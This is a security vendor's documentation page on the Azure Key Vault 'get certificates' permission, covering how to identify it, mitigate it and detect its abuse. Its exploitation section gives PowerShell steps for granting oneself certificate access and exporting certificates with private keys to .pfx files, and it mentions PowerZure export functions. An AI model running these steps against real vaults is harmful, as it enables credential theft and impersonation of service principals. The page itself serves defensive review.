> For the complete documentation index, see [llms.txt](https://docs.forestall.io/fsprotect/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.forestall.io/fsprotect/edges/azure/az_get_certificates.md).

# AZ\_GET\_CERTIFICATES

## Summary

|                            |                                                                                                                                                                              |
| -------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **FSProtect ACL Alias**    | AZ\_GET\_CERTIFICATES                                                                                                                                                        |
| **Azure Alias**            | Get Certificates (Key Vault Data Plane)                                                                                                                                      |
| **Affected Object Types**  | Key Vaults                                                                                                                                                                   |
| **Exploitation Certainty** | Certain                                                                                                                                                                      |
| **Permission**             | Key Vault data-plane permission `certificates/get` — either via Key Vault access policy or Azure RBAC role **Key Vault Certificates User** or **Key Vault Certificate User** |

## Description

`AZ_GET_CERTIFICATES` represents the ability to **read certificates** from an Azure Key Vault. This is a data-plane permission that allows retrieval of certificate objects (and their associated private keys, if exportable) stored in the vault.

Key Vault certificates are used for:

* **Service principal authentication** — certificates used as credentials for Entra ID applications.
* **TLS/SSL certificates** — for web apps, API gateways, and other services.
* **Code signing certificates**.
* **Encryption certificates** — S/MIME, document encryption.

The most dangerous scenario is when certificates are used as **service principal credentials**. Exporting such a certificate allows an attacker to authenticate as the service principal and inherit all its permissions, including potentially privileged API permissions or Azure RBAC roles.

## Identification

### PowerShell (Az Module)

```powershell
Connect-AzAccount

# Check access policies on a vault (vault access policy model)
$vault = Get-AzKeyVault -VaultName "<VaultName>"
$vault.AccessPolicies | Where-Object { $_.PermissionsToCertificates -match "get|list|all" } |
    Select-Object DisplayName, ObjectId, PermissionsToCertificates |
    Format-Table -AutoSize

# Check RBAC assignments (RBAC access model)
Get-AzRoleAssignment -Scope $vault.ResourceId |
    Where-Object { $_.RoleDefinitionName -match "Key Vault Certificate" -or $_.RoleDefinitionName -eq "Key Vault Administrator" } |
    Select-Object DisplayName, RoleDefinitionName, ObjectType |
    Format-Table -AutoSize
```

### Azure GUI

1. Open **Azure Portal** → navigate to the target **Key Vault**.
2. Go to **Access policies** → review policies that include **Get** under **Certificate permissions**.
3. Alternatively, go to **Access control (IAM)** → review assignments for certificate-related roles.

## Exploitation

### Step 1 — Grant Yourself Certificate Access (as Key Vault Contributor)

```powershell
Connect-AzAccount

# Grant yourself certificate get/list permissions via access policy
Set-AzKeyVaultAccessPolicy -VaultName "<VaultName>" `
    -ObjectId "<YourObjectId>" `
    -PermissionsToCertificates get,list
```

### Step 2 — Read and Export Certificates

```powershell
Connect-AzAccount

# List all certificates in the vault
$certs = Get-AzKeyVaultCertificate -VaultName "<VaultName>"

# Read each certificate
$certs | ForEach-Object {
    $cert = Get-AzKeyVaultCertificate -VaultName "<VaultName>" -Name $_.Name
    [PSCustomObject]@{
        Name       = $_.Name
        Thumbprint = $cert.Thumbprint
        NotBefore  = $cert.NotBefore
        Expires    = $cert.Expires
        Enabled    = $cert.Enabled
    }
} | Format-Table -AutoSize

# Export certificate with private key (if exportable)
$certName = "<CertName>"
$secret = Get-AzKeyVaultSecret -VaultName "<VaultName>" -Name $certName -AsPlainText
$secretBytes = [Convert]::FromBase64String($secret)
[IO.File]::WriteAllBytes(".\$certName.pfx", $secretBytes)
Write-Host "Certificate exported to .\$certName.pfx"
```

![Read and Export Certificates](/files/WE2nEzGVlA5rkGP06RuR)

### Via PowerZure

* Get-AzureKeyVaultContent
* Export-AzureKeyVaultContent

## Opsec Considerations

Azure will create a new log event for the Key Vault whenever a certificate is accessed. Each `CertificateGet` operation is logged in Key Vault diagnostic logs with the caller identity and IP address.

## Mitigation

1. **Restrict certificate access policies**
   * Go to **Azure Portal** → target Key Vault → **Access policies**.
   * Remove `get` permission from any principal that does not need to read certificates.
2. **Mark certificates as non-exportable**
   * When creating certificates, set the private key as **not exportable** to prevent extraction.
3. **Switch to Azure RBAC model**
   * Use granular RBAC roles for certificate access control.
4. **Use managed identities instead of certificates**
   * Prefer managed identities over certificate-based service principal authentication where possible.
5. **Enable diagnostic logging**
   * Go to Key Vault → **Diagnostic settings** → enable **AuditEvent** logging.

## Detection

Monitor certificate access in **Key Vault diagnostic logs**.

* Enable **AuditEvent** logging on the Key Vault.
* Alert on:
  * `CertificateGet` operations, especially on certificates used for service principal auth.
  * Bulk certificate access from unusual identities.
  * Certificate downloads outside of expected automation patterns.

### Azure Monitor / Log Analytics (KQL)

```kql
AzureDiagnostics
| where ResourceProvider == "MICROSOFT.KEYVAULT"
| where OperationName in ("CertificateGet", "CertificateList", "SecretGet")
| project TimeGenerated, CallerIPAddress, OperationName, ResultType, identity_claim_upn_s, Resource, id_s
```

## References

* <https://learn.microsoft.com/en-us/azure/key-vault/certificates/about-certificates>
* <https://blog.netspi.com/azure-automation-accounts-key-stores/>
* <https://powerzure.readthedocs.io/en/latest/Functions/operational.html#get-azurekeyvaultcontent>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.forestall.io/fsprotect/edges/azure/az_get_certificates.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.